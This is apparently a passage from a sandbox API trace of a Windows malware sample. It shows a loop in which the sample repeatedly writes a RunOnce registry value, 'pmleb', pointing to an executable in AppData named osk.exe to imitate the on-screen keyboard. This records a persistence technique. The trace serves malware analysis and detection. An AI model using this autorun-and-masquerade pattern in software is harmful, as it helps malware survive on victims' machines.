HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.638] RegCloseKey (hKey=0x280) returned 0x0 [0084.638] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.638] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.638] SetTimer (hWnd=0x20280, nIDEvent=0x2179, uElapse=0xa, lpTimerFunc=0x0) returned 0x2179 [0084.638] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.651] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.651] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.651] KillTimer (hWnd=0x20280, uIDEvent=0x2179) returned 1 [0084.652] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.652] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.652] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.652] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.652] RegCloseKey (hKey=0x280) returned 0x0 [0084.653] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.653] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.653] SetTimer (hWnd=0x20280, nIDEvent=0x217a, uElapse=0xa, lpTimerFunc=0x0) returned 0x217a [0084.653] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.667] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.667] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.667] KillTimer (hWnd=0x20280, 
uIDEvent=0x217a) returned 1 [0084.667] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.668] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.668] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.668] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.668] RegCloseKey (hKey=0x280) returned 0x0 [0084.668] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.668] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.668] SetTimer (hWnd=0x20280, nIDEvent=0x217b, uElapse=0xa, lpTimerFunc=0x0) returned 0x217b [0084.669] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.682] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.682] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.682] KillTimer (hWnd=0x20280, uIDEvent=0x217b) returned 1 [0084.683] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.683] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.683] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.683] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.684] RegCloseKey (hKey=0x280) returned 0x0 [0084.684] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.684] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.684] SetTimer (hWnd=0x20280, nIDEvent=0x217c, uElapse=0xa, lpTimerFunc=0x0) returned 0x217c [0084.684] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.698] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.698] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.698] KillTimer (hWnd=0x20280, uIDEvent=0x217c) returned 1 [0084.698] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.699] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.699] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.699] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.699] RegCloseKey (hKey=0x280) returned 0x0 [0084.699] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.700] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.700] SetTimer (hWnd=0x20280, nIDEvent=0x217d, uElapse=0xa, lpTimerFunc=0x0) returned 0x217d [0084.700] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.713] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.713] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.714] KillTimer (hWnd=0x20280, uIDEvent=0x217d) returned 1 [0084.714] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 
[0084.714] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.714] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.715] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.715] RegCloseKey (hKey=0x280) returned 0x0 [0084.715] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.715] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.715] SetTimer (hWnd=0x20280, nIDEvent=0x217e, uElapse=0xa, lpTimerFunc=0x0) returned 0x217e [0084.715] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.729] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.729] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.729] KillTimer (hWnd=0x20280, uIDEvent=0x217e) returned 1 [0084.730] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.730] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.730] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.730] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.731] RegCloseKey (hKey=0x280) returned 0x0 
[0084.731] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.731] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.731] SetTimer (hWnd=0x20280, nIDEvent=0x217f, uElapse=0xa, lpTimerFunc=0x0) returned 0x217f [0084.731] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.745] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.745] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.745] KillTimer (hWnd=0x20280, uIDEvent=0x217f) returned 1 [0084.745] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.745] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.746] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.746] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.746] RegCloseKey (hKey=0x280) returned 0x0 [0084.746] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.746] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.746] SetTimer (hWnd=0x20280, nIDEvent=0x2180, uElapse=0xa, lpTimerFunc=0x0) returned 0x2180 [0084.746] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.760] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.760] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.760] KillTimer (hWnd=0x20280, uIDEvent=0x2180) returned 1 [0084.761] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.761] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.761] 
RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.761] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.762] RegCloseKey (hKey=0x280) returned 0x0 [0084.762] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.762] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.762] SetTimer (hWnd=0x20280, nIDEvent=0x2181, uElapse=0xa, lpTimerFunc=0x0) returned 0x2181 [0084.762] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.776] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.776] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.776] KillTimer (hWnd=0x20280, uIDEvent=0x2181) returned 1 [0084.777] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.777] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.777] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.777] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.777] RegCloseKey (hKey=0x280) returned 0x0 [0084.778] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.778] 
ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.778] SetTimer (hWnd=0x20280, nIDEvent=0x2182, uElapse=0xa, lpTimerFunc=0x0) returned 0x2182 [0084.778] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.791] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.792] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.792] KillTimer (hWnd=0x20280, uIDEvent=0x2182) returned 1 [0084.792] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.792] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.792] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.793] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.793] RegCloseKey (hKey=0x280) returned 0x0 [0084.793] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.793] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.793] SetTimer (hWnd=0x20280, nIDEvent=0x2183, uElapse=0xa, lpTimerFunc=0x0) returned 0x2183 [0084.793] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.807] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.807] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.807] KillTimer (hWnd=0x20280, uIDEvent=0x2183) returned 1 [0084.807] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.808] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.808] RegCreateKeyExA (in: hKey=0x80000001, 
lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.808] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.808] RegCloseKey (hKey=0x280) returned 0x0 [0084.809] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.809] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.809] SetTimer (hWnd=0x20280, nIDEvent=0x2184, uElapse=0xa, lpTimerFunc=0x0) returned 0x2184 [0084.809] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.823] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.823] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.823] KillTimer (hWnd=0x20280, uIDEvent=0x2184) returned 1 [0084.823] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.824] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.824] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.824] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.824] RegCloseKey (hKey=0x280) returned 0x0 [0084.824] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.824] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 
[0084.824] SetTimer (hWnd=0x20280, nIDEvent=0x2185, uElapse=0xa, lpTimerFunc=0x0) returned 0x2185 [0084.824] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.838] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.838] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.838] KillTimer (hWnd=0x20280, uIDEvent=0x2185) returned 1 [0084.839] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.839] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.839] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.839] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.840] RegCloseKey (hKey=0x280) returned 0x0 [0084.840] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.840] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.840] SetTimer (hWnd=0x20280, nIDEvent=0x2186, uElapse=0xa, lpTimerFunc=0x0) returned 0x2186 [0084.840] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.854] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.854] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.855] KillTimer (hWnd=0x20280, uIDEvent=0x2186) returned 1 [0084.855] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.855] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.856] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, 
dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.856] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.856] RegCloseKey (hKey=0x280) returned 0x0 [0084.856] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.856] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.856] SetTimer (hWnd=0x20280, nIDEvent=0x2187, uElapse=0xa, lpTimerFunc=0x0) returned 0x2187 [0084.856] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.870] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.870] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.870] KillTimer (hWnd=0x20280, uIDEvent=0x2187) returned 1 [0084.870] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.871] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.871] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.871] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.871] RegCloseKey (hKey=0x280) returned 0x0 [0084.871] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.871] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.871] SetTimer (hWnd=0x20280, nIDEvent=0x2188, uElapse=0xa, lpTimerFunc=0x0) returned 0x2188 
[0084.872] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.885] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.885] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.885] KillTimer (hWnd=0x20280, uIDEvent=0x2188) returned 1 [0084.886] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.886] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.886] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.886] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.886] RegCloseKey (hKey=0x280) returned 0x0 [0084.887] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.887] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.887] SetTimer (hWnd=0x20280, nIDEvent=0x2189, uElapse=0xa, lpTimerFunc=0x0) returned 0x2189 [0084.887] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.901] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.901] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.901] KillTimer (hWnd=0x20280, uIDEvent=0x2189) returned 1 [0084.901] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.902] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.902] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: 
phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.902] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.902] RegCloseKey (hKey=0x280) returned 0x0 [0084.902] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.902] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.903] SetTimer (hWnd=0x20280, nIDEvent=0x218a, uElapse=0xa, lpTimerFunc=0x0) returned 0x218a [0084.903] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.916] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.916] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.916] KillTimer (hWnd=0x20280, uIDEvent=0x218a) returned 1 [0084.917] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.917] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.917] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.917] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.918] RegCloseKey (hKey=0x280) returned 0x0 [0084.918] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.918] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.918] SetTimer (hWnd=0x20280, nIDEvent=0x218b, uElapse=0xa, lpTimerFunc=0x0) returned 0x218b [0084.918] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: 
